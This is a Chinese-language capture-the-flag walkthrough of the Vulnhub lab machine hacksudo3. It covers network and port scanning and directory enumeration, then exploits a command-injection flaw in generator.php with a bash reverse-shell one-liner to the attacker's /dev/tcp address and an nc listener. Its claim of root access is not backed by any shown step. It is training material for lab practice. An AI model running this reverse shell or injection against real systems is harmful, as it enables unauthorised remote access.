带你玩转渗透测试靶场Vulnhub——hacksudo3

靶机获取:因本人网盘内存满了无法上传靶场各位可以在文章末尾添加我的v来获取靶场

一.搭建环境靶机

攻击机kali  IP地址:192.168.1.101

靶机IP地址:192.168.1.108

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段即可)

靶机环境搭建步骤

1.将下载好的hacksudo3导入VirtualBox

2.将网卡设置成和kali攻击机同一网段即可

二.实战

1.网络发现

netdiscover -i eth0 -r 192.168.1.0/24(指定网卡扫描)

2.查看靶机开放端口

使用nmap -A -sV -T4 -p- 靶机IP 查看靶机开放端口

根据以上信息可得知开放了80端口

21和22端口的状态均为filtered

3.枚举漏洞

访问80端口分析数据,查看源码

源码没有问题,先扫一下目录

从目录里面发现/hidden/  我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的

继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站

访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站

我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面

 刚才目录里还扫描到了info.php,我们现在来访问一下看看里面有什么可用的资源

访问:192.168.1.108/generator.php发现了一个smart登录口随便输一个字符进去,看一下是否存在命令注入漏洞

提交ls -la 以上的命令都可以执行的话,证明是存在命令注入漏洞的

2.漏洞利用

生成一个反向的shell

`bash -c "bash -i >& /dev/tcp/192.168.1.101/6666 0>&1"`

KALI开启本地监听:nc -lvp 6666

然后成功拿到shell

总结:本靶机是通过命令注入漏洞进行渗透,获取root权限

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值